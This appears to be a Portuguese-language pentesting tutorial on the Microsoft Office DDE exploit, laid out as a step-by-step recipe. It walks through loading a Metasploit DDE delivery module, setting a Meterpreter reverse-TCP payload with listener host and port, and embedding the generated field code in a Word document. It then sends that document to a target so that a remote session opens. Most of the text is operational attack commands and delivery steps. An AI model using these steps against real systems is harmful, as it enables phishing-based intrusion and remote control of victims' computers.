O DDE exploit também era conhecido como troca dinâmica de dados, permite que os dados sejam transferidos entre aplicativos sem qualquer interação do usuário. Os hackers utilizaram esse método para executar scripts mal-intencionados para comprometê-lo.
Foi relatado à Microsoft pelo Sensepost, Etienne Stalmans e Saif El-Sherei, mas não foi corrigido porque muitos aplicativos estão usando o protocolo DDE. Esta exploração não requer uma função de macro para ser ativada.
Pré-requisitos - DDE exploit
- 📌Máquina Windows
- 📌Microsoft Office (qualquer versão)
- 📌KALI LINUX
Teremos que importar uma exploração do Metasploit.
Faça o download do GitHub usando o terminal de comando
Mova o script para o local do Metasploit
Agora digite msfconsole no terminal, que inicia o framework Metasploit e digite reload_all para carregar os módulos.
Esse exploit usa a função dde para entregar a carga hta. Agora digite
use exploit/windows/dde_delivery
then set the sever host using the following command
set SRVHOST 192.168.177.141
precisamos definir um ouvinte de carga. Não use a porta 8080, pois a porta do servidor está definida por padrão para 8080
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.177.141
- set LPORT 6708
- exploit
Agora copie e cole o código em qualquer documento do word. usamos o office 365 pro plus, totalmente atualizado. Localize a fórmula e você deve ter uma pequena caixa de erro no documento e, em seguida, clique com o botão direito do mouse no código de alternância. cole o comando no documento entre parênteses de flor. salve o documento.
Envie o documento para o suspeito e uma sessão de medidor será aberta. Dê uma olhada no vídeo
Pentesting Windows usando o Microsoft Office DDE Exploit